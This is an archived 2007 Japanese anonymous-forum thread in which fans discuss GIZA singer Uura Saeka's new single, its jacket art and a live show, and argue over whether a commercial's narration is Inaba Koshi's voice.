そうなのか

322 :名無しの歌姫:2007/02/14(水) 23:03:37 ID:CPBpw9Ae
>>317
そのニュースって、いつの?最近?

323 :名無しの歌姫:2007/02/14(水) 23:39:48 ID:6g2kfYxq
2005年だよ。

324 :名無しの歌姫:2007/02/16(金) 02:03:13 ID:sJB1TqDR
tearsのジャケはまぁまぁだったが今回の糞だな

325 :名無しの歌姫:2007/02/16(金) 21:26:38 ID:momJScpZ
誰か里菜ろだに宇浦パートもうpしてくれ

326 :名無しの歌姫:2007/02/17(土) 11:33:33 ID:0sPnBkQm
ttp://www.youtube.com/watch?v=fGORmGDtTJY

借りてきた猫みたいな宇浦タソういういし

327 :名無しの歌姫:2007/02/17(土) 18:46:46 ID:W+udU8F4
宇浦を含めGIZAアーティストはavexより実力ある人多いと思う。でも宣伝上手なavexの方が売れる。拠点が大阪だから仕方ないがGIZAはもう少し宣伝上手になるべきだと思う。

328 :名無しの歌姫:2007/02/17(土) 20:05:46 ID:+q8v+W/e
>>327
大阪なのに802でかからないもん。

329 :名無しの歌姫:2007/02/19(月) 00:37:35 ID:ALbWQtGl
ちょww過疎り過ぎだろ
やっぱり宇浦ファンなんかいないようなもんだな

330 :名無しの歌姫:2007/02/19(月) 00:45:11 ID:94jyEVFp
下手ではないが、まだ若いからな…
もうちょい経験積ませてからデビューさせればよかったのに。

331 :名無しの歌姫:2007/02/19(月) 00:47:21 ID:ALbWQtGl
>>330
確かにな
北空とか星田みたいに経験積ませてからのが良かったかもな

332 :名無しの歌姫:2007/02/19(月) 01:34:56 ID:NVCjS/3I
里菜のバレライに連れていった姉は、宇浦が一番歌うまいと言ってましたよ

333 :名無しの歌姫:2007/02/19(月) 02:47:39 ID:ALbWQtGl
>>332
それはないなw
まああの三人ならレベル高いからしょうがないけど

334 :名無しの歌姫:2007/02/19(月) 05:10:16 ID:hJ+sr90u
LIVE映像うpできる宇浦ファンがいないから人気でない


335 :名無しの歌姫:2007/02/19(月) 12:50:25 ID:LaCxD+Y3
稲葉曲だけプチヒットですぐ消えるんだろうな
こいつ長所ないの?トークが上手いとか性格明るいとか
カリスマ性はなさそうだから、何か長所がないとブレイクできません

336 :名無しの歌姫:2007/02/19(月) 16:06:12 ID:ALbWQtGl
シャララのジャケ写がなんか男みたいに見えるw

337 :名無しの歌姫:2007/02/19(月) 17:13:18 ID:7LpipiGy
横顔のジャケか?俺も男に見えた 織田信成ぽい


338 :名無しの歌姫:2007/02/19(月) 20:17:37 ID:A/OVV4jn
>>335
明るい要素はないみたいだな
人見知りが激しい、友達を作るのが苦手っていってる

339 :名無しの歌姫:2007/02/20(火) 02:32:54 ID:GUMsvUnO
GIZAが暗いイメージを作ってるのかも

340 :名無しの歌姫:2007/02/20(火) 03:05:22 ID:lOQ3firR
暗くはないんじゃない?まだ場慣れしてないだけだとおもう

341 :名無しの歌姫:2007/02/20(火) 10:13:13 ID:20xB8GIH
黒髪か・・・これからどんどん派手になってゆくんだろうなぁ
竹井くらいじゃないの?派手にならなかったの

342 :名無しの歌姫:2007/02/20(火) 16:02:17 ID:BSDD+jFV
ttp://vermillion.livedoor.biz/
ここでバレンタイライブの映像ちょっとだけ見れる

343 :名無しの歌姫:2007/02/20(火) 18:25:07 ID:la2qCskn
映像じゃなくて画像やん

344 :名無しの歌姫:2007/02/20(火) 18:41:21 ID:BSDD+jFV
CMが流れてその後ちょっとだけライブ映像見れるやん

345 :名無しの歌姫:2007/02/20(火) 20:37:57 ID:IvYPq4vi
流れてるな
http://image.blog.livedoor.jp/vermillion_onore/imgs/b/8/ayakashi.3g2

しかも稲葉の声じゃん
CMもライブも

346 :名無しの歌姫:2007/02/20(火) 21:02:42 ID:ayHen/PS
CMの声は100%別人

347 :名無しの歌姫:2007/02/20(火) 21:03:15 ID:IvYPq4vi
>>346
いやいや
>>345をちゃんと聴けよ
どう聴いても稲葉



348 :名無しの歌姫:2007/02/20(火) 21:19:35 ID:bbof40Jc
どう聞いても別人

349 :名無しの歌姫:2007/02/20(火) 21:20:24 ID:IvYPq4vi
どう聴いても稲葉

350 :名無しの歌姫:2007/02/20(火) 21:26:44 ID:bbof40Jc
コーラスは稲葉だけどCMのナレーションは違う

351 :名無しの歌姫:2007/02/20(火) 22:08:17 ID:20xB8GIH
CMのナレーションは初回だけ稲葉だったけど2回目から別人になったらしい
だからナレーションは2種類ある

352 :名無しの歌姫:2007/02/20(火) 22:12:22 ID:xXv3eSxJ
>>351
初回からずっと同じだよ
毎週録画して見てるからw

353 :名無しの歌姫:2007/02/20(火) 22:13:28 ID:IvYPq4vi
>>352
うpうp

354 :名無しの歌姫:2007/02/20(火) 23:16:29 ID:la2qCskn
稲葉とは断定し難いな・・・
ガネクロの「この手を伸ばせば」の方のCMナレーションもこの人っぽいし

355 :名無しの歌姫:2007/02/20(火) 23:47:35 ID:lOQ3firR
なんで稲葉がCMのナレーションやらなきゃならないんだよ

356 :名無しの歌姫:2007/02/21(水) 00:42:29 ID:hB0E2Wd5
CM初回分と今週分うpった
同じ声だし、そして稲葉じゃないし
ttp://www.fileup.org/fup139355.zip.html
パス uura

357 :名無しの歌姫:2007/02/21(水) 03:31:55 ID:gT6mjL9T
17日のバレライのセトリキボン・・・

358 :名無しの歌姫:2007/02/21(水) 06:29:41 ID:S6P/GyUY
>>347
耳が腐ってる。

359 :名無しの歌姫:2007/02/21(水) 07:42:02 ID:fdPh2DAx
コメント映像みたけどフツーの子だな

360 :名無しの歌姫:2007/02/21(水) 08:59:10 ID:hyEojlfa
別に普通で良くない?
アイドルじゃないんだし


361 :名無しの歌姫:2007/02/21(水) 11:36:29 ID:AeMEEGUK
そういえば宇浦って地声でhihiAでるんだよな?

362 :名無しの歌姫:2007/02/21(水) 15:11:44 ID:A1ljeamA
>>356
これは稲葉だな

363 :名無しの歌姫:2007/02/21(水) 17:58:31 ID:A1ljeamA
MU-GEN #111 2/21(水)〜2/26 (火)O.A

宇浦冴香/Sg「Sha la la ?アヤカシNAIGHT-」B’z稲葉浩志楽曲提供!!

要チェックや!

364 :名無しの歌姫:2007/02/21(水) 18:01:40 ID:fdPh2DAx
む げん?地方かよ!

365 :名無しの歌姫:2007/02/21(水) 18:04:51 ID:A1ljeamA
>>364
というか
MU-GENも見れない田舎に住んでるのか?

366 :名無しの歌姫:2007/02/21(水) 18:23:10 ID:HyO0ep71
無限は田舎の方が映る

367 :名無しの歌姫:2007/02/21(水) 18:28:04 ID:fdPh2DAx
>>365
神戸だがみれん


368 :名無しの歌姫:2007/02/21(水) 19:14:05 ID:fojXSvdR
>>362
>>358

369 :名無しの歌姫:2007/02/21(水) 21:03:08 ID:I5BvqXOB
スカパーで見ろよ
ttp://www.music272.tv/program/mugen/index.html

370 :名無しの歌姫:2007/02/21(水) 23:25:08 ID:li22sgyf
>>368
なんかよくわからんけど
稲葉ヲタ必死だなw

371 :名無しの歌姫:2007/02/22(木) 00:57:16 ID:pszQnsVZ
>341
高岡とかタンバとか倉木や中村や三枝辺りもずっと変わらず地味だと思うけど。

てかアヤカシのジャケ、夜じゃないんだね。

372 :名無しの歌姫:2007/02/22(木) 01:10:35 ID:e2oAZwtH
>>367
尼崎だが見れるぞ
ケーブルに入ればな

373 :名無しの歌姫:2007/02/22(木) 01:58:31 ID:JGsxmUK7
>>370
GIZAが否定してるし

374 :名無しの歌姫:2007/02/22(木) 01:59:24 ID:e2oAZwtH
>>373
上げるなよ
B'zスレでも上げて書き込むのか?

375 :名無しの歌姫:2007/02/22(木) 02:10:58 ID:JGsxmUK7
>>374
GIZAが否定してるし

376 :名無しの歌姫:2007/02/22(木) 02:13:22 ID:e2oAZwtH
>>375
かわいいやっちゃなぁw

377 :名無しの歌姫:2007/02/22(木) 10:28:56 ID:TpVU1oOT
むしろこのスレは上げて書いたほうがいいでしょ
荒らしなんか来ないし。


378 :名無しの歌姫:2007/02/22(木) 23:50:18 ID:VMZdPJRU
発売が待ち遠しい…。

66 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)